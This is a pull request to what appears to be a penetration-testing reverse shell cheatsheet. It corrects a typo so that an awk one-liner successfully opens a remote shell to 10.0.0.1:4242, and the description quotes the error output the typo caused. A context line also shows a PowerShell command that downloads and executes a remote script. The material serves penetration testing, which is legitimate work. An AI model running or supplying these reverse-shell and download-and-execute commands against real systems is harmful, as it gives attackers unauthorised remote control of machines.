### PR TITLE
Fix awk snippet

### DIFF
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -173,7 +173,7 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse
 ### Awk
 
 ```powershell
-awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
+awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
 ```
 
 ### Java


### PR DESCRIPTION
A small typo in the awk one-liner prevents successful execution of the command.

```
awk: cmd. line:1: warning: remote host and port information (10.0.0.1>, 4242) invalid: Name or service not known
awk: cmd. line:1: fatal: can't open two way pipe `/inet/tcp/0/10.0.0.1>/4242' for input/output (No such file or directory)
```

This commit fixes this :)